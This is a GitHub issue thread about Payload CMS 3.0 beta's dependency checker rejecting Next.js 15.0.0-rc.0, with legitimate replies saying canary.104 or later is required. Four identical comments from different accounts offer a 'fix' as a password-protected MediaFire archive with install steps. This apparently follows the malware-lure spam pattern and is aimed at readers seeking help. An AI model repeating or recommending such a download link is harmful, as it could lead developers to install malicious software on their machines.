### ISSUE TITLE
Dependency Checker Issue with Next.js 15.0.0-rc.0

### ISSUE THREAD

**Issue by Dan6erbond** [payloadcms/payload#7904]
### Environment Info

```text
Binaries:
  Node: 18.20.4
  npm: N/A
  Yarn: N/A
  pnpm: 8.3.1
Relevant Packages:
  payload: 3.0.0-beta.94
  next: 15.0.0-rc.0
  @payloadcms/db-mongodb: 3.0.0-beta.94
  @payloadcms/email-nodemailer: 3.0.0-beta.94
  @payloadcms/graphql: 3.0.0-beta.94
  @payloadcms/next/utilities: 3.0.0-beta.94
  @payloadcms/plugin-cloud: 3.0.0-beta.94
  @payloadcms/richtext-lexical: 3.0.0-beta.94
  @payloadcms/translations: 3.0.0-beta.94
  @payloadcms/ui/shared: 3.0.0-beta.94
  react: 19.0.0-rc-06d0b89e-20240801
  react-dom: 19.0.0-rc-06d0b89e-20240801
Operating System:
  Platform: win32
  Arch: x64
  Version: Windows 10 Pro
  Available memory (MB): 32440
  Available CPU cores: 20
```

### Describe the Bug

When updating all my dependencies this included Next.js to the latest RC. Resulting in the following error from Payload:

```node
 ⨯ node_modules\payload\dist\utilities\dependencies\dependencyChecker.js (45:1) @ checkDependencies
 ⨯ Internal error: Error: Dependency next is on version 15.0.0-rc.0, but >=15.0.0-canary.104 or greater is required. Please update this dependency.
    at checkDependencies (./node_modules/payload/dist/utilities/dependencies/dependencyChecker.js:53:31)
    at async checkPayloadDependencies (./node_modules/payload/dist/checkPayloadDependencies.js:36:5)
    at async BasePayload.init (./node_modules/payload/dist/index.js:477:13)
digest: "766125829"
  43 |                 if (settings.version.startsWith('>=')) {
  44 |                     if (versionCompareResult === 'lower') {
> 45 |                         throw new Error(`Dependency ${dependency} is on version ${resolvedDependency.version}, but ${settings.version} or greater is required. Please update this dependency.`);
     | ^
  46 |                     }
  47 |                 } else if (versionCompareResult === 'lower' || versionCompareResult === 'greater') {
  48 |                     throw new Error(`Dependency ${dependency} is on version ${resolvedDependency.version}, but ${settings.version} is required. Please update this dependency.`);
```

### Reproduction Steps

1. Create Next.js app.
2. Install Payload.
3. Launch admin panel.

**Comment by pyrosensei** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SolMill** [comment]
There were some breaking changes in [beta 75](https://github.com/payloadcms/payload/releases/tag/v3.0.0-beta.75)
Should be `"next": "15.0.0-canary.104"` in package.json

**Comment by AlessioGr** [comment]
As explained in the error message, next `15.0.0-canary.104` or greater is required.

Is there anything we can do to make this error message clearer / more helpful? Open to suggestions!
